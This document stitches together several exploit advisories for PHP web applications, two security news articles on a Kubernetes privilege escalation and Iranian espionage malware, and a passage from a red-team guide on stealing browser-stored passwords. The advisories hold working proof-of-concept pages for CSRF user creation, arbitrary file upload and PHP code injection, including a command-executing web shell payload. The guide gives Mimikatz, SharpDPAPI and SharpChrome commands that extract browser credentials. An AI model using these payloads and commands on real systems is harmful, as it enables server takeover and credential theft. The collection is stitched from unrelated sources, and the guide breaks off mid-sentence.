Loan Management System version 1.0 suffers from a cross site request forgery vulnerability.

=============================================================================================================================================  
| # Title     : Loan Management System 1.0 CSRF Vulnerability                                                                               |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            |  
| # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/loan-management-system.zip                            |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] This HTML page :

    is a  user registration form that allows users to input a username, password, and upload an avatar image.   
  The form data is then sent via an AJAX request to a server-side script for processing.

[+] Here's a breakdown of how it works:

    HTML Structure

    Form Elements:

          username: A text field where the user can input their username.  
        password: A password field for entering a password.  
        img: A file input for uploading an avatar image (restricted to image file types).

    Save User Button:

          An input element with the type button is used to trigger the saveUser() function when clicked.

[+] JavaScript (AJAX Request)

        AJAX Request:

          An XMLHttpRequest object (xhr) is used to send the form data to a server-side script (Users.php).  
        The request method is POST, and the data is sent to the specified URL.  
        The onload function checks if the request was successful (status code 200). If it was,  
    it alerts the user that the save was successful; otherwise, it alerts the user of an error.

[+] save code as poc.html 

[+] payload : 

<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title>User Registration</title>  
</head>  
<body>

    <h2>User Registration</h2>  
    <form id="userForm" enctype="multipart/form-data">  
        <label for="username">Username:</label>  
        <input type="text" id="username" name="username" required><br><br>

        <label for="password">Password:</label>  
        <input type="password" id="password" name="password" required><br><br>

        <input type="button" value="Save User" onclick="saveUser()">  
    </form>

    <script>  
        function saveUser() {  
            var form = document.getElementById('userForm');  
            var formData = new FormData(form);

            var xhr = new XMLHttpRequest();  
            xhr.open("POST", "http://127.0.0.1/loan/ajax.php?action=save_user", true);

            xhr.onload = function () {  
                if (xhr.status === 200) {  
                    alert('User saved successfully');  
                } else {  
                    alert('An error occurred while saving the user');  
                }  
            };

            xhr.send(formData);  
        }  
    </script>

</body>  
</html>

Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

Loan Management System 1.0 Cross Site Request Forgery

Biobook Social Networking Site version 1.0 suffers from an arbitrary file upload vulnerability.

    =============================================================================================================================================| # Title     : biobook Social Networking Site 1.0 Remote File Upload Vulnerability                                                         || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/sites/default/files/download/janobe/Social%20Networking%20Site%20in%20PHP%20with%20Full%20Source%20Code.zip                                       |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] The following html code uploads a executable malicious file remotely .[+] Go to the line 7.[+] Set the target site link Save changes and apply . [+] save code as poc.html .<div id="right-nav">      <h1>Update Status</h1>  <div>      <form method="post" action="http://127.0.0.1/social/post.php" enctype="multipart/form-data">        <textarea placeholder="Whats on your mind?" name="content" class="post-text" required=""></textarea>        <input type="file" name="image">        <button class="btn-share" name="Submit" value="Log out">Share</button>      </form>  </div>      </div>    [+] http://127.0.0.1/social/upload/Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Biobook Social Networking Site 1.0 Arbitrary File Upload

Accounting Journal Management System version 1.0 suffers from a code injection vulnerability.

=============================================================================================================================================  
| # Title     : Accounting Journal Management System 1.0 php code injection Vulnerability                                                   |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            |  
| # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/ajms_0_0.zip                                          |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] This payload injects code of your choice into an HTML page. 

       You give it a name and save it in the root directory of the script. and executes it remotely.

[+] Line 11 : 'Content[welcome]' = Replace "welcome" with any label you want.

[+] Line 11 :  Replace the payload as you wish = <?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>

[+] save payload as poc.html 

[+] Set your target url

[+] payload : 

<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title> PHP code injection Tool</title>  
    <script>  
        async function sendRequest() {  
            const url = document.getElementById('url').value;  
            const postData = {  
                'content[welcome]': `<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>`  
            };

            try {  
                const response = await fetch(`${url}/classes/SystemSettings.php?f=update_settings`, {  
                    method: 'POST',  
                    headers: {  
                        'Content-Type': 'application/x-www-form-urlencoded'  
                    },  
                    body: new URLSearchParams(postData).toString()  
                });

                if (response.ok) {  
                    document.getElementById('result').innerText = '[+] Injection in welcome page\n[+] ' + url + '/?cmd=ls -al\n';

                } else {  
                    document.getElementById('result').innerText = 'Error: ' + response.statusText;  
                }  
            } catch (error) {  
                document.getElementById('result').innerText = 'Error making request: ' + error.message;  
            }  
        }  
    </script>  
</head>  
<body>  
    <h1>Injection Tool</h1>  
    <form onsubmit="event.preventDefault(); sendRequest();">  
        <label for="url">Enter URL:</label>  
        <input type="text" id="url" name="url" required>  
        <button type="submit">Submit</button>  
    </form>  
    <pre id="result"></pre>  
</body>  
</html>

Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

Accounting Journal Management System 1.0 Code Injection

ABIC Cardiology Management System version 1.0 suffers from a cross site request forgery vulnerability.

=============================================================================================================================================  
| # Title     : ABIC cardiology Management System 1.0 CSRF Vulnerability                                                                    |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            |  
| # Vendor    : https://abicegypt.com/                                                                                                      |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

  [+] Line 7 : Set your target url

[+] save payload as poc.html 

[+] payload : 

<div class="panel panel-default panel-table">  
                <div class="panel-heading"> <h2 class="text-center">New User </h2>  
                </div>  
                <div class="panel-body">  
                  <div class="col-md-offset-2 col-md-8">

<form action="https://127.0.0.1.com/eg-admin/users/insert.php?" method="post" enctype="multipart/form-data" name="form1" id="form1">

            <div class="form-group"> User Name  
                <input type="text" name="username" class="form-control" placeholder="Insert User Name">  
            </div>  
            <div class="form-group"> Password  
                <input type="text" name="password" class="form-control" placeholder="Insert Password">  
            </div>

      <div class="col-xs-12">  
                <button type="submit" class="btn btn-primary btn-xl" name="add"> SAVE </button>  
            </div>  
  <input type="hidden" name="MM_insert" value="form1">  
</form>

              </div>  
                </div>  
              </div>

Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

ABIC Cardiology Management System 1.0 Cross Site Request Forgery

Hospital Management System version 1.0 suffers from a code injection vulnerability.

=============================================================================================================================================  
| # Title     : Hospital Management System 1.0(WYSIWYG) code injection Vulnerability                                                        |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            |  
| # Vendor    : https://phpgurukul.com/wp-content/uploads/2017/12/Hostel-Management-Syste-Updated-Code.zip                                  |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] Part 01 : about-us.php

[+] This payload injects code of your choice into the database via NicEdit is a WYSIWYG editor V: 0.9 r25 which is called inside the file /hms/admin/about-us.php . 

   [+] Line 2  :  Make sure to include your database connection here

[+] Line 44 :  Send the form data using fetch API (Set your target url)

[+] save payload as poc.php in your localhost path .

[+] payload : 

<?php  
include('http://127.0.0.1/hospital/hms/admin/include/config.php'); // Make sure to include your database connection here

if (isset($_POST['submit'])) {  
    $pagetitle = $_POST['pagetitle'];  
    $pagedes = $con->real_escape_string($_POST['pagedes']);  
    $query = mysqli_query($con, "UPDATE tblpage SET PageTitle='$pagetitle', PageDescription='$pagedes' WHERE PageType='aboutus'");

    if ($query) {  
        echo '<script>alert("About Us has been updated.")</script>';  
    } else {  
        echo '<script>alert("Something Went Wrong. Please try again.")</script>';  
    }  
    exit;  
}  
?>

<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title>indoushka | Update About Us Content</title>  
      
    <script src="http://js.nicedit.com/nicEdit-latest.js" type="text/javascript"></script>  
    <script type="text/javascript">  
        // Apply NicEdit to all text areas when the DOM is loaded  
        bkLib.onDomLoaded(nicEditors.allTextAreas);

        // Function to handle form submission using JavaScript  
        function submitForm(event) {  
            event.preventDefault(); // Prevent default form submission

            const pagetitle = document.getElementById('pagetitle').value;  
            const pagedes = nicEditors.findEditor('pagedes').getContent(); // Get the NicEdit content

            // Prepare the form data to be sent  
            const formData = new FormData();  
            formData.append('pagetitle', pagetitle);  
            formData.append('pagedes', pagedes);  
            formData.append('submit', true);

            // Send the form data using fetch API  
            fetch('http://127.0.0.1/hospital/hms/admin/about-us.php', {  
                method: 'POST',  
                body: formData,  
            })  
            .then(response => response.text())  
            .then(data => {  
                alert('About Us content has been updated successfully.');  
                console.log(data); // Handle the response from the server  
            })  
            .catch(error => {  
                console.error('Error:', error);  
            });  
        }  
    </script>  
    <style>  
        /* Center the form container */  
        .editor-container {  
            max-width: 800px;  
            margin: 0 auto; /* Center horizontally */  
            padding: 20px;  
            text-align: center; /* Center the content inside */  
        }

        /* Ensure the textarea takes the full width */  
        #pagedes {  
            width: 100%;  
            height: 300px;  
            margin: 0 auto;  
        }  
    </style>  
</head>  
<body>  
    <div id="app">  
        <div class="app-content">  
            <div class="main-content">  
                <div class="wrap-content container" id="container">  
                      
                    <section id="page-title">  
                        <div class="row">  
                            <div class="col-sm-8">  
                                <h1 class="mainTitle">Update the About Us Content</h1>  
                            </div>

                                                          </li>  
                            </ol>  
                        </div>  
                    </section>  
                      
                    <div class="container-fluid container-fullw bg-white">  
                        <div class="row">  
                            <div class="col-md-12">  
                                  
                                <div class="editor-container">  
                                    <form class="forms-sample" method="post" onsubmit="submitForm(event);">  
                                        <div class="form-group">  
                                            <label for="pagetitle">Page Title</label>  
                                            <input id="pagetitle" name="pagetitle" type="text" class="form-control" required>  
                                        </div>  
                                        <div class="form-group">  
                                            <label for="pagedes">Page Description</label>  
                                              
                                            <textarea class="form-control" name="pagedes" id="pagedes" rows="12"></textarea>  
                                        </div>  
                                        <button type="submit" class="btn btn-primary mr-2" name="submit">Submit</button>  
                                    </form>  
                                </div>  
                            </div>  
                        </div>  
                    </div>  
                      
                </div>  
            </div>  
        </div>  
    </div>  
      
</body>  
</html>

---------------------- [+] Part 02 : contact.php [+] --------------------

[+] Line 4  :  Make sure to include your database connection here

[+] Line 60 :  Send the form data using fetch API (Set your target url)

[+] save payload as poc.php in your localhost path .

[+] payload : 

<?php

// عنوان الخادم الخارجي  
$url = 'http://127.0.0.1/hospital/hms/admin/include/config.php';

// جلب البيانات من الخادم الخارجي  
$response = file_get_contents($url);

// التحقق من وجود البيانات  
if ($response !== FALSE) {  
    // التعامل مع البيانات  
    echo $response;  
} else {  
    echo 'حدث خطأ أثناء جلب البيانات.';  
}

if (isset($_POST['submit'])) {  
    $pagetitle = $_POST['pagetitle'];  
    $pagedes = $con->real_escape_string($_POST['pagedes']);  
    $email = $con->real_escape_string($_POST['email']);  
    $mobnum = $con->real_escape_string($_POST['mobnum']);

        $query = mysqli_query($con, "UPDATE tblpage SET PageTitle='$pagetitle', PageDescription='$pagedes', Email='$email', MobileNumber='$mobnum' WHERE PageType='contactus'");

    if ($query) {  
        echo '<script>alert("Contact Us has been updated.")</script>';  
    } else {  
        echo '<script>alert("Something Went Wrong. Please try again.")</script>';  
    }  
    exit;  
}

?>  
<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title>Admin | Update Contact Us Content</title>  
      
    <script src="http://js.nicedit.com/nicEdit-latest.js" type="text/javascript"></script>  
    <script type="text/javascript">  
        bkLib.onDomLoaded(nicEditors.allTextAreas);

        function submitForm(event) {  
            event.preventDefault();

            const pagetitle = document.getElementById('pagetitle').value;  
            const pagedes = nicEditors.findEditor('pagedes').getContent();  
            const email = document.getElementById('email').value;  
            const mobnum = document.getElementById('mobnum').value;

            const formData = new FormData();  
            formData.append('pagetitle', pagetitle);  
            formData.append('pagedes', pagedes);  
            formData.append('email', email);  
            formData.append('mobnum', mobnum);  
            formData.append('submit', true);

            fetch('http://127.0.0.1/hospital/hms/admin/contact.php', {  
                method: 'POST',  
                body: formData,  
            })  
            .then(response => response.text())  
            .then(data => {  
                alert('Contact Us content has been updated successfully.');  
                console.log(data);  
            })  
            .catch(error => {  
                console.error('Error:', error);  
            });  
        }  
    </script>  
    <style>  
        .editor-container {  
            max-width: 800px;  
            margin: 0 auto;  
            padding: 20px;  
            text-align: center;  
        }

        #pagedes {  
            width: 100%;  
            height: 300px;  
            margin: 0 auto;  
        }  
    </style>  
</head>  
<body>  
    <div id="app">  
        <div class="app-content">  
            <div class="main-content">  
                <div class="wrap-content container" id="container">  
                    <section id="page-title">  
                        <div class="row">  
                            <div class="col-sm-8">  
                                <h1 class="mainTitle">Admin | Update Contact Us Content</h1>  
                            </div>  
                            <ol class="breadcrumb">  
                                <li class="active">  
                                    <span>Update Contact Us Content</span>  
                                </li>  
                            </ol>  
                        </div>  
                    </section>  
                    <div class="container-fluid container-fullw bg-white">  
                        <div class="row">  
                            <div class="col-md-12">  
                                <div class="editor-container">  
                                    <form class="forms-sample" method="post" onsubmit="submitForm(event);">  
                                        <div class="form-group">  
                                            <label for="pagetitle">Page Title</label>  
                                            <input id="pagetitle" name="pagetitle" type="text" class="form-control" required>  
                                        </div>  
                                        <div class="form-group">  
                                            <label for="pagedes">Page Description</label>  
                                            <textarea class="form-control" name="pagedes" id="pagedes" rows="12"></textarea>  
                                        </div>  
                                        <div class="form-group">  
                                            <label for="email">Email</label>  
                                            <input id="email" name="email" type="email" class="form-control" required>  
                                        </div>  
                                        <div class="form-group">  
                                            <label for="mobnum">Mobile Number</label>  
                                            <input id="mobnum" name="mobnum" type="text" class="form-control" required>  
                                        </div>  
                                        <button type="submit" class="btn btn-primary mr-2" name="submit">Submit</button>  
                                    </form>  
                                </div>  
                            </div>  
                        </div>  
                    </div>  
                </div>  
            </div>  
        </div>  
    </div>  
</body>  
</html>

Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

Hospital Management System 1.0 Code Injection

Event Registration and Attendance System version 1.0 suffers from a code injection vulnerability.

=============================================================================================================================================| # Title     : Event Registration and Attendance System 1.0 wysiwyg code injection Vulnerability                                           || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/online-news-portal.zip                                |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] infected item : admin_class.php    $data .= ", content = '".htmlentities(str_replace("'","&#x2019;",$content))."' ";    if(!empty($_FILES['cover']['tmp_name'])){      $fname = strtotime(date("Y-m-d H:i"))."_".(str_replace(" ","-",$_FILES['cover']['name']));      $move = move_uploaded_file($_FILES['cover']['tmp_name'],'../assets/uploads/content_images/'. $fname);      $protocol = strtolower(substr($_SERVER["SERVER_PROTOCOL"],0,5))=='https'?'https':'http';      $hostName = $_SERVER['HTTP_HOST'];      $path =explode('/',$_SERVER['PHP_SELF']);      $currentPath = '/'.$path[1];       if($move){            $data .= ", cover_img='$fname' ";      }    }  [+] Line 27 : Set your target url.[+] This payload is WYSIWYG based The page can be edited remotely and a malicious executable file can be uploaded ,via summernote is a WYSIWYG editor V: 0.8.18.[+] save payload as poc.html [+] payload : <!DOCTYPE html><html lang="en"><head>    <meta charset="UTF-8">    <meta name="viewport" content="width=device-width, initial-scale=1.0">    <title>Manage About Page</title>        <link href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css" rel="stylesheet">    <link href="https://cdnjs.cloudflare.com/ajax/libs/summernote/0.8.18/summernote-bs4.min.css" rel="stylesheet">    <script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>    <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.bundle.min.js"></script>    <script src="https://cdnjs.cloudflare.com/ajax/libs/summernote/0.8.18/summernote-bs4.min.js"></script></head><body>    <div class="container mt-5">        <div class="col-lg-12">            <div class="card card-outline card-primary">                <div class="card-body">                    <form action="" id="manage-about">                        <div class="form-group">                            <textarea name="content" id="content" cols="30" rows="10" class="summernote2 form-control">                                <p style="margin-right: 0px; margin-bottom: 15px; margin-left: 0px; padding: 0px; text-align: justify; color: rgb(0, 0, 0); font-family: 'Open Sans', Arial, sans-serif; font-size: 14px;">indoushka.</p>                            </textarea>                        </div>                    </form>                </div>                <div class="card-footer border-top border-info">                    <div class="d-flex w-100 justify-content-center align-items-center">                        <button class="btn btn-flat bg-gradient-primary mx-2" form="manage-about">Save</button>                    </div>                </div>            </div>        </div>    </div>    <script>        $(document).ready(function(){            // Initialize Summernote Editor            $('.summernote2').summernote({                height: 300,                toolbar: [                    ['style', ['style']],                    ['font', ['bold', 'italic', 'underline', 'strikethrough', 'superscript', 'subscript', 'clear']],                    ['fontname', ['fontname']],                    ['fontsize', ['fontsize']],                    ['color', ['color']],                    ['para', ['ol', 'ul', 'paragraph', 'height']],                    ['table', ['table']],                    ['insert', ['link', 'picture']],                    ['view', ['undo', 'redo', 'fullscreen', 'codeview', 'help']]                ],                callbacks: {                    onImageUpload: function(files) {                        saveImg(files[0]);  // Handle image upload                    }                }            });            // Function to save uploaded image            function saveImg(_file) {                var data = new FormData();                data.append("file", _file);                $.ajax({                    data: data,                    type: "POST",                    url: "http://www.news.witnessradio.org/admin/ajax.php?action=save_image",                    cache: false,                    contentType: false,                    processData: false,                    success: function(resp) {                        var image = $('<img>').attr('src', resp);                        $('.summernote2').summernote("insertNode", image[0]);                    }                });            }        });        // Form Submission        $('#manage-about').submit(function(e) {            e.preventDefault();            start_load();  // Start a loading indicator (you need to define this function)            $.ajax({                url: 'http://www.news.witnessradio.org/admin/ajax.php?action=save_about',                data: new FormData($(this)[0]),                cache: false,                contentType: false,                processData: false,                method: 'POST',                type: 'POST',                success: function(resp) {                    if(resp == 1) {                        alert_toast('Data successfully saved', "success");                        end_load();  // End the loading indicator (you need to define this function)                    }                }            });        });        // Optional: Define start_load and end_load functions        function start_load() {            // Add your loading indicator logic here        }        function end_load() {            // Remove your loading indicator logic here        }        function alert_toast(message, type) {            alert(message); // Basic alert. Replace with a better toast notification if needed.        }    </script></body></html>[+] path of evil : http://127.0.0.1/news_portal/assets/uploads/content_images/shell.phpGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Event Registration and Attendance System 1.0 Code Injection

Cybersecurity researchers have disclosed a security flaw impacting Microsoft Azure Kubernetes Services that, if successfully exploited, could allow an attacker to escalate their privileges and access credentials for services used by the cluster.
"An attacker with command execution in a Pod running within an affected Azure Kubernetes Services cluster could download the configuration used to

Vulnerability / Container Security

Cybersecurity researchers have disclosed a security flaw impacting Microsoft Azure Kubernetes Services that, if successfully exploited, could allow an attacker to escalate their privileges and access credentials for services used by the cluster.

"An attacker with command execution in a Pod running within an affected Azure Kubernetes Services cluster could download the configuration used to provision the cluster node, extract the transport layer security (TLS) bootstrap tokens, and perform a TLS bootstrap attack to read all secrets within the cluster," Google-owned Mandiant said.

Clusters using "Azure CNI" for the "Network configuration" and "Azure" for the "Network Policy" have been found to be impacted by the privilege escalation bug. Microsoft has since addressed the issue following responsible disclosure.

The attack technique devised by the threat intelligence firm hinges on accessing a little-known component called Azure WireServer to request a key used to encrypt protected settings values ("wireserver.key") and use it to decode a provisioning script that includes several secrets such as follows -

*   KUBELET\_CLIENT\_CONTENT (Generic Node TLS Key)
*   KUBELET\_CLIENT\_CERT\_CONTENT (Generic Node TLS Certificate)
*   KUBELET\_CA\_CRT (Kubernetes CA Certificate)
*   TLS\_BOOTSTRAP\_TOKEN (TLS Bootstrap Authentication Token)

"KUBELET\_CLIENT\_CONTENT, KUBELET\_CLIENT\_CERT\_CONTENT, and KUBELET\_CA\_CRT can be Base64 decoded and written to disk to use with the Kubernetes command-line tool kubectl to authenticate to the cluster," researchers Nick McClendon, Daniel McNamara, and Jacob Paullus said.

"This account has minimal Kubernetes permissions in recently deployed Azure Kubernetes Service (AKS) clusters, but it can notably list nodes in the cluster."

TLS\_BOOTSTRAP\_TOKEN, on the other hand, could be used to enable a TLS bootstrap attack and ultimately gain access to all secrets used by running workloads. The attack does not require the pod to be running as root.

"Adopting a process to create restrictive NetworkPolicies that allow access only to required services prevents this entire attack class," Mandiant said. "Privilege escalation via an undocumented service is prevented when the service cannot be accessed at all."

The disclosure comes as Kubernetes security platform ARMO highlighted a new high-severity Kubernetes flaw (CVE-2024-7646, CVSS score: 8.8) that affects the ingress-nginx controller and could permit a malicious actor to gain unauthorized access to sensitive cluster resources.

"The vulnerability stems from a flaw in the way ingress-nginx validates annotations on Ingress objects," security researcher Amit Schendel said.

"The vulnerability allows an attacker to inject malicious content into certain annotations, bypassing the intended validation checks. This can lead to arbitrary command injection and potential access to the ingress-nginx controller's credentials, which, in default configurations, has access to all secrets in the cluster."

It also follows the discovery of a design flaw in the Kubernetes git-sync project that could allow for command injection across Amazon Elastic Kubernetes Service (EKS), Azure Kubernetes Service (AKS), Google Kubernetes Engine (GKE), and Linode.

"This design flaw can cause either data exfiltration of any file in the pod (including service account tokens) or command execution with the git\_sync user privileges," Akamai researcher Tomer Peled said. "To exploit the flaw, all an attacker needs to do is apply a YAML file on the cluster, which is a low-privilege operation."

There are no patches being planned for the vulnerability, making it crucial that organizations audit their git-sync pods to determine what commands are being run.

"Both vectors are due to a lack of input sanitization, which highlights the need for a robust defense regarding user input sanitization," Peled said. "Blue team members should be on the lookout for unusual behavior coming from the gitsync user in their organizations."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Researchers Uncover TLS Bootstrap Attack on Azure Kubernetes Clusters

Iranian state-sponsored threat actors have been observed orchestrating spear-phishing campaigns targeting a prominent Jewish figure starting in late July 2024 with the goal of delivering a new intelligence-gathering tool called AnvilEcho.
Enterprise security company Proofpoint is tracking the activity under the name TA453, which overlaps with activity tracked by the broader cybersecurity

Iranian state-sponsored threat actors have been observed orchestrating spear-phishing campaigns targeting a prominent Jewish figure starting in late July 2024 with the goal of delivering a new intelligence-gathering tool called AnvilEcho.

Enterprise security company Proofpoint is tracking the activity under the name TA453, which overlaps with activity tracked by the broader cybersecurity community under the monikers APT42 (Mandiant), Charming Kitten (CrowdStrike), Damselfly (Symantec), Mint Sandstorm (Microsoft), and Yellow Garuda (PwC).

"The initial interaction attempted to lure the target to engage with a benign email to build conversation and trust to then subsequently click on a follow-up malicious link," security researchers Joshua Miller, Georgi Mladenov, Andrew Northern, and Greg Lesnewich said in a report shared with The Hacker News.

"The attack chain attempted to deliver a new malware toolkit called BlackSmith, which delivered a PowerShell trojan dubbed AnvilEcho."

TA453 is assessed to be affiliated with Iran's Islamic Revolutionary Guard Corps (IRGC), carrying out targeted phishing campaigns that are designed to support the country's political and military priorities.

Data shared by Google-owned Mandiant last week shows that the U.S. and Israel accounted for roughly 60% of APT42's known geographic targeting, followed by Iran and the U.K.

The social engineering efforts are both persistent and persuasive, masquerading as legitimate entities and journalists to initiate conversations with prospective victims and build rapport over time, before ensnaring them in their phishing traps via malware-laced documents or bogus credential harvesting pages.

"APT42 would engage their target with a social engineering lure to set-up a video meeting and then link to a landing page where the target was prompted to login and sent to a phishing page," Google said.

"Another APT42 campaign template is sending legitimate PDF attachments as part of a social engineering lure to build trust and encourage the target to engage on other platforms like Signal, Telegram, or WhatsApp."

The latest set of attacks, observed by Proofpoint starting July 22, 2024, involved the threat actor contacting multiple email addresses for an unnamed Jewish figure, inviting them to be a guest for a podcast while impersonating the Research Director for the Institute for the Study of War (ISW).

In response to a message from the target, TA453 is said to have sent a password-protected DocSend URL that, in turn, led to a text file containing a URL to the legitimate ISW-hosted podcast. The phony messages were sent from the domain understandingthewar\[.\]org, a clear attempt to mimic ISW's website ("understandingwar\[.\]org").

"It is likely that TA453 was attempting to normalize the target clicking a link and entering a password so the target would do the same when they delivered malware," Proofpoint said.

In follow-up messages, the threat actor was found replying with a Google Drive URL hosting a ZIP archive ("Podcast Plan-2024.zip") that, in turn, contained a Windows shortcut (LNK) file responsible for delivering the BlackSmith toolset.

AnvilEcho, which is delivered by means of BlackSmith, has been described as a likely successor to the PowerShell implants known as CharmPower, GorjolEcho, POWERSTAR, and PowerLess. BlackSmith is also designed to display a lure document as a distraction mechanism.

It's worth noting that the name "BlackSmith" also overlaps with a browser stealer component detailed by Volexity earlier this year in connection with a campaign that distributed BASICSTAR in attacks aimed at high-profile individuals working on Middle Eastern affairs.

"AnvilEcho is a PowerShell trojan that contains extensive functionality," Proofpoint said. "AnvilEcho capabilities indicate a clear focus on intelligence collection and exfiltration."

Some of its important functions include conducting system reconnaissance, taking screenshots, downloading remote files, and uploading sensitive data over FTP and Dropbox.

"TA453 phishing campaigns \[...\] have consistently reflected IRGC intelligence priorities," Proofpoint researcher Joshua Miller said in a statement shared with The Hacker News.

"This malware deployment attempting to target a prominent Jewish figure likely supports ongoing Iranian cyber efforts against Israeli interests. TA453 is doggedly consistent as a persistent threat against politicians, human rights defenders, dissidents, and academics."

The findings come days after HarfangLab disclosed a new Go-based malware strain referred to as Cyclops that has been possibly developed as a follow-up to another Charming Kitten backdoor codenamed BellaCiao, indicating that the adversary is actively retooling its arsenal in response to public disclosures. Early samples of the malware date back to December 2023.

"It aims at reverse-tunneling a REST API to its command-and-control (C2) server for the purposes of controlling targeted machines," the French cybersecurity company said. "It allows operators to run arbitrary commands, manipulate the target's filesystem, and use the infected machine to pivot into the network."

It's believed that the threat actors used Cyclops to single out a non-profit organization that supports innovation and entrepreneurship in Lebanon, as well as a telecommunication company in Afghanistan. The exact ingress route used for the attacks is presently unknown.

"The choice of Go for the Cyclops malware has a few implications," HarfangLab said. "Firstly, it confirms the popularity of this language among malware developers. Secondly, the initially low number of detections for this sample indicates that Go programs may still represent a challenge for security solutions."

"And finally, it is possible that macOS and Linux variants of Cyclops were also created from the same codebase and that we have yet to find them."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Iranian Cyber Group TA453 Targets Jewish Leader with New AnvilEcho Malware

Microsoft introduced Data Protection Application Programming Interface (DPAPI) in Windows environments as a method to encrypt and decrypt sensitive data such as credentials using the… 
Continue reading → Web Browser Stored Credentials

Microsoft introduced Data Protection Application Programming Interface (DPAPI) in Windows environments as a method to encrypt and decrypt sensitive data such as credentials using the _CryptProtectData_ and _CryptUnprotectData_ functions. Browsers such as Chrome and Edge utilize DPAPI to encrypt credentials prior to storage. The master key is stored locally and can be decrypted with the password of the user, which then is used to decrypt DPAPI data blobs.

In the world of red team operations, locations which credentials are stored are always a target as it will allow access to other applications or lateral movement. Organizations which are utilizing Microsoft Edge or Google Chrome for storage the credentials of their users are vulnerable due to the abuse of CryptUnprotectData API (T1555.003). It should be noted that reading credentials stored in browsers doesn’t require any form of elevation and it is challenging for defensive teams to detect due to the high volume of events which are generated in case of monitoring.

Master keys are located in the following path and by default are not visible as these are classified as protected operating system files.

    C:\users\<user>\appdata\roaming\microsoft\protect\<SID>\<MasterKey>

User Master Keys

Mimikatz was the first tool that interacted with DPAPI, and has specific modules to perform decryption operations. However, the Mimikatz encrypted key parser is broken and therefore it can no longer be used to decrypt DPAPI blobs as it fails with a message of _No Alg and/or key handle_. Instead of using Mimikatz, it is feasible to harvest the encrypted key from “_Local State_” by executing the following command from a PowerShell console:

(gc "$env:LOCALAPPDATA\\Google\\Chrome\\User Data\\Local State" | ConvertFrom-Json).os\_crypt.encrypted\_key

Local State – Encrypted Key

The encrypted key can be ingested in the Mimikatz _dpapi::chrome_ module to decrypt the contents of “_Login Data_“.

    dpapi::chrome /in:"%LOCALAPPDATA%\Google\Chrome\User Data\Default\Login Data" /encryptedkey:[EncryptedKey] /unprotect

Mimikatz – DPAPI Decrypt

SharpDPAPI is a C# port of the Mimikatz DPAPI functionality which enables in-memory based execution. Master keys can be retrieved by executing the following command:

    dotnet inline-execute SharpDPAPI.exe masterkeys /rpc

ShaprDPAPI – User Master Keys

SharpDPAPI – GUID & Decryption Keys

SharpChrome is part of the SharpDPAPI and targets sensitive information stored in Chromium based browsers such as Chrome, Edge and Brave. The tool will attempt to read and decrypt the AES key from the “_Local State_” file using the cryptographic function BCrypt. The API _CryptUnprotectData()_ is used to decrypt passwords stored in browsers.

    dotnet inline-execute SharpChrome logins

SharpChrome – DPAPI

An alternative tool called CredentialKatz implements a different method as credentials are dumped directly from the credential manager of Chrome or Edge. This method is more evasive as it attempts to inject into an existing browser process and read credentials and doesn’t utilize DPAPI for decryption. Offline parsing of credentials is also supported via a minidump file. CredentialKatz harvest passwords from credential manager in plain-text by using the _PasswordReuseDetectorImpl_ class.

    CredentialKatz.exe

CredentialKatz

**Domain Backup Key**

In the event that domain administrator access has been achieved the DPAPI backup key can be retrieved from the domain controller to decrypt master keys from any user in the domain. The backup key is stored in the following Active Directory location:

